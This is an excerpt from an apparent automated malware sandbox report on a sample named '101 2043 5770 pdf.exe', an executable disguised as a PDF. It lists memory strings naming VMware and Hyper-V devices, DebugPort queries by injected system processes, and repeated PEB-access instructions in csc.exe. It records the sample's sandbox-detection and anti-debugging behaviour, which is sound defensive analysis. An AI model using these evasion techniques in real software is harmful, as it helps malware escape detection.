Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 00000007.00000000.2132972491.00000000097F3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 00000007.00000000.2149784147.000000000C36E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.4598436939.00000000098E3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: explorer.exe, 00000007.00000000.2149784147.000000000C36E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: explorer.exe, 00000007.00000000.2132377434.0000000009605000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: explorer.exe, 00000007.00000000.2149784147.000000000C36E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@]
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2276739444.000002653FC55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000007.00000002.4602699260.000000000C377000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000007.00000002.4598436939.00000000098E3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000007.00000002.4598436939.00000000098E3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2276739444.000002653FC55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\raserver.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_00409AB0 rdtsc 6_2_00409AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0040ACF0 LdrLoadDll, 6_2_0040ACF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599E59C mov eax, dword ptr fs:[00000030h] 6_2_0599E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059EB594 mov eax, dword ptr fs:[00000030h] 6_2_059EB594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059EB594 mov eax, dword ptr fs:[00000030h] 6_2_059EB594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05994588 mov eax, dword ptr fs:[00000030h] 6_2_05994588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05962582 mov eax, dword ptr fs:[00000030h] 6_2_05962582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05962582 mov ecx, dword ptr fs:[00000030h] 6_2_05962582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595758F mov eax, dword ptr fs:[00000030h] 6_2_0595758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595758F mov eax, dword ptr fs:[00000030h] 6_2_0595758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595758F mov eax, dword ptr fs:[00000030h] 6_2_0595758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A1F5BE mov eax, dword ptr fs:[00000030h] 6_2_05A1F5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h] 6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h] 6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h] 6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h] 6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h] 6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h] 6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h] 6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h] 6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h] 6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h] 6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h] 6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h] 6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h] 6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059845B1 mov eax, dword ptr fs:[00000030h] 6_2_059845B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059845B1 mov eax, dword ptr fs:[00000030h] 6_2_059845B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059FD5B0 mov eax, dword ptr fs:[00000030h] 6_2_059FD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059FD5B0 mov eax, dword ptr fs:[00000030h] 6_2_059FD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h] 6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h] 6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h] 6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h] 6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h] 6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E05A7 mov eax, dword ptr fs:[00000030h] 6_2_059E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E05A7 mov eax, dword ptr fs:[00000030h] 6_2_059E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E05A7 mov eax, dword ptr fs:[00000030h] 6_2_059E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059895DA mov eax, dword ptr fs:[00000030h] 6_2_059895DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059665D0 mov eax, dword ptr fs:[00000030h] 6_2_059665D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599A5D0 mov eax, dword ptr fs:[00000030h] 6_2_0599A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599A5D0 mov eax, dword ptr fs:[00000030h] 6_2_0599A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059DD5D0 mov eax, dword ptr fs:[00000030h] 6_2_059DD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059DD5D0 mov ecx, dword ptr fs:[00000030h] 6_2_059DD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599E5CF mov eax, dword ptr fs:[00000030h] 6_2_0599E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599E5CF mov eax, dword ptr fs:[00000030h] 6_2_0599E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059955C0 mov eax, dword ptr fs:[00000030h] 6_2_059955C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A355C9 mov eax, dword ptr fs:[00000030h] 6_2_05A355C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h] 6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h] 6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h] 6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h] 6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h] 6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h] 6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A335D7 mov eax, dword ptr fs:[00000030h] 6_2_05A335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A335D7 mov eax, dword ptr fs:[00000030h] 6_2_05A335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A335D7 mov eax, dword ptr fs:[00000030h] 6_2_05A335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599C5ED mov eax, dword ptr fs:[00000030h] 6_2_0599C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599C5ED mov eax, dword ptr fs:[00000030h] 6_2_0599C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059625E0 mov eax, dword ptr fs:[00000030h] 6_2_059625E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h] 6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h] 6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h] 6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h] 6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h] 6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h] 6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h] 6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h] 6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h] 6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h] 6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h] 6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h] 6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h] 6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h] 6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h] 6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A1B52F mov eax, dword ptr fs:[00000030h] 6_2_05A1B52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A35537 mov eax, dword ptr fs:[00000030h] 6_2_05A35537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05997505 mov eax, dword ptr fs:[00000030h] 6_2_05997505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05997505 mov ecx, dword ptr fs:[00000030h] 6_2_05997505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F6500 mov eax, dword ptr fs:[00000030h] 6_2_059F6500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h] 6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h] 6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h] 6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h] 6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h] 6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h] 6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h] 6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h] 6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h] 6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h] 6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h] 6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h] 6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h] 6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h] 6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h] 6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h] 6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h] 6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h] 6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h] 6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h] 6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h] 6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h] 6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h] 6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h] 6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599D530 mov eax, dword ptr fs:[00000030h] 6_2_0599D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599D530 mov eax, dword ptr fs:[00000030h] 6_2_0599D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05968550 mov eax, dword ptr fs:[00000030h] 6_2_05968550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05968550 mov eax, dword ptr fs:[00000030h] 6_2_05968550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599B570 mov eax, dword ptr fs:[00000030h] 6_2_0599B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599B570 mov eax, dword ptr fs:[00000030h] 6_2_0599B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599656A mov eax, dword ptr fs:[00000030h] 6_2_0599656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595B562 mov eax, dword ptr fs:[00000030h] 6_2_0595B562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05969486 mov eax, dword ptr fs:[00000030h] 6_2_05969486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595B480 mov eax, dword ptr fs:[00000030h] 6_2_0595B480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059934B0 mov eax, dword ptr fs:[00000030h] 6_2_059934B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059944B0 mov ecx, dword ptr fs:[00000030h] 6_2_059944B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059EA4B0 mov eax, dword ptr fs:[00000030h] 6_2_059EA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059664AB mov eax, dword ptr fs:[00000030h] 6_2_059664AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A094E0 mov eax, dword ptr fs:[00000030h] 6_2_05A094E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059604E5 mov ecx, dword ptr fs:[00000030h] 6_2_059604E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A354DB mov eax, dword ptr fs:[00000030h] 6_2_05A354DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E7410 mov eax, dword ptr fs:[00000030h] 6_2_059E7410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598340D mov eax, dword ptr fs:[00000030h] 6_2_0598340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05998402 mov eax, dword ptr fs:[00000030h] 6_2_05998402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599A430 mov eax, dword ptr fs:[00000030h] 6_2_0599A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595C427 mov eax, dword ptr fs:[00000030h] 6_2_0595C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595E420 mov eax, dword ptr fs:[00000030h] 6_2_0595E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h] 6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598245A mov eax, dword ptr fs:[00000030h] 6_2_0598245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595645D mov eax, dword ptr fs:[00000030h] 6_2_0595645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h] 6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h] 6_2_0599E443
